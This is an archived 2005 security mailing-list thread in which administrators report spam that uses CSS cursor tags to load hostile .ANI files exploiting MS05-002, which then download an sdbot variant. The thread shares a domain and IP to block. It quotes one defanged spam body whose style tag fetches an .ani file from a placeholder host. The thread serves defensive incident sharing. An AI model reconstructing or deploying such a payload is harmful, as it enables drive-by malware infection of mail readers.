RE: ANI Exploits in Spam

From: Britton, Jeff B. (JBBritton_at_LMUS.LeggMason.com)
Date: 03/29/05

  • Next message: James C. Slora, Jr.: "RE: ANI Exploits in Spam" 
    To: "'James C. Slora, Jr.'" <james.slora@phra.com>, incidents@securityfocus.com
Date: Tue, 29 Mar 2005 10:59:38 -0500

    I notice the same trend. ANI files seem to be coming from:
    (some name).sitemynet.com\*.ani

    If possible, I would block sitemynet.com (212.101.97.230).

    -----Original Message-----
    From: James C. Slora, Jr. [mailto:james.slora@phra.com]
    Sent: Monday, March 28, 2005 6:42 PM
    To: incidents@securityfocus.com
    Subject: ANI Exploits in Spam

    FYI -

    Today we received dozens of spam messages with cursor style tags that
    point to hostile .ANI files exploiting the cursor and icon vulnerability
    from MS05-002.
     
    The ANI files in my spam get downloaded from an apparently compromised
    set of virtual servers sharing a box. On a vulnerable system, the ANI
    will download and execute a variant of sdbot named hi.exe from a server
    registered to a different ISP.

    Older versions of Outlook will download the hostile ANI if the message
    gets previewed in HTML.

    VirusTotal showed about half the vendors detected the hostile ANI file
    under various names, and only a few detected the packed sdbot in hi.exe.

    I do have samples if anyone is interested.

    There are many different message subjects and message bodies following
    similar forms. The ANI files also have a different name on each virtual
    server.

    Typical hostile spam body is below. I removed the < from the style tags,
    and the specific site from the url.

    Keep your motor running dude as you're into a surprise. I;mcoming home
    tonight and taking you out. happy birthday love Jess

    style>* {CURSOR: url("http://SiteStillLive-Removed/m89.ani")}/style>

    IMPORTANT: The security of electronic mail sent through the Internet
    is not guaranteed. Legg Mason therefore recommends that you do not
    send confidential information to us via electronic mail, including social
    security numbers, account numbers, and personal identification numbers.

    Delivery, and timely delivery, of electronic mail is also not
    guaranteed. Legg Mason therefore recommends that you do not send time-sensitive
    or action-oriented messages to us via electronic mail, including
    authorization to "buy" or "sell" a security or instructions to conduct any
    other financial transaction. Such requests, orders or instructions will
    not be processed until Legg Mason can confirm your instructions or
    obtain appropriate written documentation where necessary.

  • Next message: James C. Slora, Jr.: "RE: ANI Exploits in Spam"